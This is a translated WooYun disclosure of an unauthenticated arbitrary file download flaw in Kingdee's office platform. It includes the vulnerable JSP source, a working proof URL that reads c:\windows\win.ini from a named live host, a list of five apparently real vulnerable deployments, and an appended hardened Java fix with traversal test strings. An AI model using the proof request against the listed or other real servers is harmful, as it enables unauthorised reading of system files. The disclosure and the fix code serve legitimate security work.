WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
2015-08-04: Details sent to the vendor, awaiting vendor handling
2015-08-04: Vendor confirmed; details disclosed to the vendor only
2015-08-07: Details opened to third-party security partners
2015-09-28: Details opened to core white hats and domain experts
2015-10-08: Details opened to regular white hats
2015-10-18: Details opened to intern white hats
2015-11-02: Details disclosed to the public
Kingdee Collaborative Office Platform arbitrary file download vulnerability (no login required)
Testing shows that this system has an arbitrary file download vulnerability and that no login is required. The vulnerable file is:
/oa/admin/application/file_download.jsp?filePath=
Part of the vulnerable code:
<%@ page import="java.util.Calendar,org.springside.core.Constants,cn.firstsoft.firstframe.admin.Environment"%>
<%
// filePath is read straight from the request and used as a filesystem path with no validation
String logPath = request.getParameter("filePath")==null?"D:\\KingdeeOA\\Tomcat_5.5\\logs\\catalina.2007-12-29.log ":request.getParameter("filePath");
String contentType = request.getParameter("contentType")==null?"application/x-download":request.getParameter("contentType");
String fileName = request.getParameter("fileName")==null?"file.txt":request.getParameter("fileName");
java.io.OutputStream ou = null;
java.io.InputStream is = null;
try {
    java.io.File logFile = new java.io.File(logPath);
    if (logFile.exists()) {
        is = new java.io.FileInputStream(logPath);
        byte[] content = new byte[1024];
        int i = 0;
        response.setContentType(contentType);
        ou = response.getOutputStream();
        // the download name is also client-controlled
        response.setHeader("Content-Disposition", "attachment; filename=\""+fileName+"\"");
        while ((i = is.read(content)) != -1) {
            ou.write(content, 0, i);
        }
        ou.flush();
    } else {
        out.println("file not found:"+logPath);
    }
} catch (Exception e) {
    System.out.println(e);
} finally {
    if (ou != null) ou.close();
    if (is != null) is.close();
}
%>
An obvious arbitrary file download vulnerability; any instance found online can be used to prove it:
http://oa.xpngs.com/oa/admin/application/file_download.jsp?filePath=c:\windows\win.ini
Accessing the URL directly downloads the file; it is saved under the name file.txt.
5 cases:
http://oa.xpngs.com/oa/themes/mskin/login/login.jsp
http://newoa.qingyitang.com:7890/oa/themes/mskin/login/login.jsp
http://wt.zhengtongauto.com/oa/themes/mskin/login/login.jsp
http://113.106.196.36:7890/oa/themes/mskin/login/login.jsp?login_error=quit
http://www.jrxoa.com/oa/themes/mskin/login/login.jsp
Downloaded file:
Fix suggestion: filter it.
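As an added illustration of what "filtering" has to mean here (this is not the report's code nor Kingdee's), the following Java class shows the hardened counterpart of the file_download.jsp logic: the client may name only a file relative to a fixed download directory, the resolved path is checked lexically and again after symlink resolution to make sure it stays inside that directory, and the Content-Disposition name is derived from the file itself rather than from a request parameter. The DOWNLOAD_ROOT directory, the sample file and the request strings in main are all constructed for the demonstration.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;

/**
 * Hardened counterpart of the vulnerable file_download.jsp shown in the report.
 * Added example, not the vendor's code. Assumption: every downloadable file
 * lives under one directory (DOWNLOAD_ROOT) and the client supplies only a
 * relative name, never an absolute path.
 */
public final class SafeFileDownload {

    // Constructed for the example; a real deployment would read this from configuration.
    static final Path DOWNLOAD_ROOT = Paths.get(System.getProperty("java.io.tmpdir"), "oa-downloads");

    /**
     * Resolves a client-supplied relative name against root and returns the
     * canonical file only if it stays inside root. Returns null for absolute
     * paths, ".." traversal, symlinks that escape the root, and non-files.
     */
    public static Path resolveInsideRoot(Path root, String requested) throws IOException {
        if (requested == null || requested.isEmpty()) {
            return null;
        }
        // Lexical check: resolve() returns an absolute argument unchanged, and
        // normalize() collapses "..", so anything outside root fails startsWith.
        Path candidate = root.resolve(requested).normalize();
        if (!candidate.startsWith(root.normalize())) {
            return null;
        }
        if (!Files.isRegularFile(candidate)) {
            return null;
        }
        // Physical check: toRealPath() follows symlinks, so a link inside root
        // that points outside it is rejected here.
        Path real = candidate.toRealPath();
        Path realRoot = root.toRealPath();
        if (!real.startsWith(realRoot)) {
            return null;
        }
        return real;
    }

    /** Builds the Content-Disposition value from the file's own name, never from request input. */
    public static String contentDisposition(Path file) {
        String name = file.getFileName().toString().replaceAll("[^A-Za-z0-9._-]", "_");
        return "attachment; filename=\"" + name + "\"";
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample root with one legitimate file.
        Files.createDirectories(DOWNLOAD_ROOT);
        Path sample = DOWNLOAD_ROOT.resolve("report.txt");
        Files.write(sample, "constructed sample content".getBytes(StandardCharsets.UTF_8));

        String[] requests = {
            "report.txt",            // legitimate relative name
            "../../../etc/passwd",   // traversal
            "/etc/passwd",           // absolute path (POSIX)
            "c:\\windows\\win.ini"   // absolute path (Windows), the kind used in the report's proof
        };
        for (String r : requests) {
            Path resolved = resolveInsideRoot(DOWNLOAD_ROOT, r);
            System.out.println(r + " -> " + (resolved == null ? "REJECTED" : "ok, " + contentDisposition(resolved)));
        }
    }
}
```

In a servlet or JSP the accepted Path would then be streamed with Files.copy(real, response.getOutputStream()) and a fixed content type; rejected requests should get a generic 404 or 403 without echoing the requested path back, which the original page's "file not found:" branch does. Only the first request above is accepted; the other three are rejected by the lexical check (or, for the Windows-style string on a POSIX host, because no such file exists under the root).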
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-08-04 15:34
Vendor response: Thank you for your attention to Kingdee's security; we have notified the relevant department to handle it.
None yet.